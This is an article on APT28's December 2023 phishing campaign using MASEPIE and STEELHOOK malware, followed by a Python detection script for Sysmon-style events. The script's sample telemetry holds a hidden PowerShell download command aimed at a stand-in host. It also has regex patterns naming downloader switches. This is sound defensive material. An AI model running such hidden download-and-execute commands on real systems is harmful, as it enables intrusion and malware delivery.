
APT28, also known as Fancy Bear and Strontium and backed by the Russian state, has been identified as the main perpetrator of a series of cyber attacks against government organizations, businesses, educational institutions and research institutes in the West, as well as NATO agencies. The attacks took place between December 15 and 25, 2023, and used phishing emails that tricked recipients into clicking a link that purported to lead to an important document.
The link redirected to a malicious web resource that used JavaScript to download a Windows Shortcut (LNK) file, which called a PowerShell command to launch a new malware named “MASEPIE.” This set off a chain of further malware downloads.
MASEPIE establishes persistence on infected systems by modifying the Windows registry and by placing a shortcut file with a misleading name in the Windows startup folder, which makes it harder to remove. PowerShell scripts called “STEELHOOK” steal data from Chrome-based web browsers, giving attackers sensitive information such as passwords and browsing history. Other tools, including OCEANMAP and IMPACKET, are used for long-term access to the system and control of the attack.
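The execution and persistence chain described above (an LNK file launching PowerShell, a shortcut dropped into the Startup folder, and a registry Run-key modification) leaves footprints that endpoint telemetry can catch. The following detection logic is an added example written for this page; it is not code from the article or from CERT-UA's advisory. The records are constructed Sysmon-style events (event ID 1 = process create, 11 = file create, 13 = registry value set); the field names follow Sysmon's schema, but every path, user name, SID and command line is a hypothetical sample, and the regular expressions are a generalization of the techniques the article names rather than signatures for the actual MASEPIE samples.

```python
"""Flag Startup-folder LNK drops, Run-key persistence and suspicious
PowerShell launches in Sysmon-style event records (constructed samples)."""
import re

# A .lnk written under the per-user or all-users Startup folder.
STARTUP_FOLDER_RE = re.compile(
    r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
# Any value written under ...\CurrentVersion\Run or RunOnce.
RUN_KEY_RE = re.compile(
    r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
# PowerShell switches and cmdlets typical of a hidden, downloading launcher.
SUSPICIOUS_PS_ARGS = re.compile(
    r"-(enc|encodedcommand|w(indowstyle)?\s+hidden|nop|noprofile)\b|"
    r"downloadfile|invoke-webrequest|iwr\b|iex\b|invoke-expression",
    re.IGNORECASE)

# Constructed sample telemetry (hypothetical host, user and paths).
SAMPLE_LOGS = [
    {   # 0: PowerShell spawned by explorer.exe (how a double-clicked LNK runs)
        "EventID": 1,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -w hidden -nop -c "iwr http://example.invalid/x"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # 1: misleadingly named shortcut dropped in the user's Startup folder
        "EventID": 11,
        "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows"
                          r"\Start Menu\Programs\Startup\Important Document.lnk",
    },
    {   # 2: Run-key value pointing at a binary in Temp
        "EventID": 13,
        "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft"
                        r"\Windows\CurrentVersion\Run\Updater",
        "Details": r"C:\Users\alice\AppData\Local\Temp\updater.exe",
    },
    {   # 3: benign scheduled PowerShell script
        "EventID": 1,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
    },
    {   # 4: benign document write
        "EventID": 11,
        "TargetFilename": r"C:\Users\alice\Documents\report.docx",
    },
]


def detect(record: dict) -> list:
    """Return human-readable findings for one event record (empty if benign)."""
    findings = []
    eid = record.get("EventID")
    if eid == 11:
        target = record.get("TargetFilename", "")
        if STARTUP_FOLDER_RE.search(target) and target.lower().endswith(".lnk"):
            findings.append(f"startup-folder LNK dropped: {target}")
    elif eid == 13:
        key = record.get("TargetObject", "")
        if RUN_KEY_RE.search(key):
            findings.append(
                f"Run-key persistence: {key} -> {record.get('Details', '')}")
    elif eid == 1:
        image = record.get("Image", "").lower()
        cmd = record.get("CommandLine", "")
        parent = record.get("ParentImage", "").lower()
        if image.endswith(("powershell.exe", "pwsh.exe")) and SUSPICIOUS_PS_ARGS.search(cmd):
            hint = " (parent explorer.exe: consistent with LNK launch)" \
                if parent.endswith("explorer.exe") else ""
            findings.append(f"suspicious PowerShell: {cmd}{hint}")
    return findings


def scan(records) -> list:
    """Run detect() over an iterable of records and collect all findings."""
    return [f for r in records for f in detect(r)]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOGS):
        print(finding)
```

Each rule on its own is noisy in a real environment (administrators write Run keys and launch PowerShell from Explorer all day), so the value lies in correlating them on one host within a short window, which is what the chain in the article would produce.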